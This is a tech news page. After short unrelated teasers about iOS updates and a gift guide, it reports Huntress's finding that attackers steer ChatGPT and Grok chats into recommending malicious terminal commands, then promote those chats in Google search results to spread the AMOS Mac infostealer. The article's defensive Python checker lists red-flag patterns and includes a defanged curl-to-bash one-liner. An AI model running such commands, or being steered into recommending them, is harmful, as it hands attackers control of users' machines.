After roughly six weeks of beta testing, iOS 26.2 and related updates have finally been released for all users, delivering a number of new features, changes, and bug fixes.
Macworld's Filipe Espósito today reported on a handful of features that Apple is said to be planning for iOS 26.4, iOS 27, and even iOS 28.
Engadget staffers spend the entire year poking, prodding and otherwise testing the latest tech gadgets, so we've got a pretty good handle on what's unique and interesting right now. We put together this list for anyone shopping for the tech-obsessed person in their life. Some of these are devices we've tested for our reviews and guides; others are items we bought for ourselves (or wish someone would buy for us). We've got more than 35 picks here, from nearly every member of the Engadget team, so chances are you'll find a good gift or two for every tech nerd you know. Here are our favorite tech gifts and gadgets for 2025.
Ever since reporting earlier this year on how easy it is to trick an agentic browser, I've been following the intersections between modern AI and old-school scams. Now, there's a new convergence on the horizon: hackers are apparently using AI prompts to seed Google search results with dangerous commands. When unwitting users run them, these commands hand the hackers the access they need to install malware.
The warning comes by way of a recent report from detection-and-response firm Huntress. Here's how it works: first, the threat actor has a conversation with an AI assistant about a common search term, steering the AI into suggesting that a certain command be pasted into the computer's terminal. They then make the chat publicly visible and pay to promote it as a sponsored result on Google. From then on, whenever someone searches for that term, the malicious instructions show up high on the first page of results.
Huntress ran tests on both ChatGPT and Grok after discovering that an attack using AMOS, a Mac-targeting infostealer, had originated from a simple Google search. The user of the infected device had searched "clear disk space on Mac," clicked a sponsored ChatGPT link and, lacking the training to see that the advice was hostile, executed the command. This let the attackers install AMOS on the machine. Huntress's testers found that both chatbots replicated the attack vector.
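None of the code below comes from Huntress's report. It's a minimal sketch, assuming a Python environment, of the kind of "look before you paste" check that flags the tells security write-ups commonly associate with these lures, such as piping a download straight into a shell, base64-hidden payloads and privilege prompts. The pattern list, the function name check_pasted_command and the defanged example command are my own illustrative choices, not anything published by Huntress.

```python
import re

# Heuristic red flags commonly reported in "paste this into Terminal" lures.
# Illustrative only; this is not an exhaustive or authoritative detector.
SUSPICIOUS_PATTERNS = [
    (r"curl[^|\n]*\|\s*(ba)?sh", "downloads a remote script and pipes it straight into a shell"),
    (r"base64\s+(-d|--decode)", "decodes a hidden (base64) payload before running it"),
    (r"\bosascript\b", "invokes AppleScript, often used for fake password prompts"),
    (r"\bsudo\b", "asks for administrator privileges"),
    (r"chmod\s+\+x", "marks a freshly downloaded file as executable"),
]

def check_pasted_command(command: str) -> list[str]:
    """Return human-readable warnings for any red flags found in a command."""
    warnings = []
    for pattern, reason in SUSPICIOUS_PATTERNS:
        if re.search(pattern, command, flags=re.IGNORECASE):
            warnings.append(reason)
    return warnings

if __name__ == "__main__":
    # A defanged stand-in for the sort of one-liner these lures tend to push.
    example = "curl -sL https://example.invalid/cleanup.sh | bash"
    for warning in check_pasted_command(example):
        print(f"WARNING: this command {warning}")
```

A checker like this obviously can't catch everything, and the article's larger point still stands: the unnerving part is that victims are handed these commands by sources they already trust.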
As Huntress points out, the evil genius of this attack is that it bypasses almost all the traditional red flags we've been taught to look for. The victim doesn't have to download a file, install a suspicious executable or even click a shady link. The only things they have to trust are a result near the top of a Google search and the advice of a familiar AI chatbot.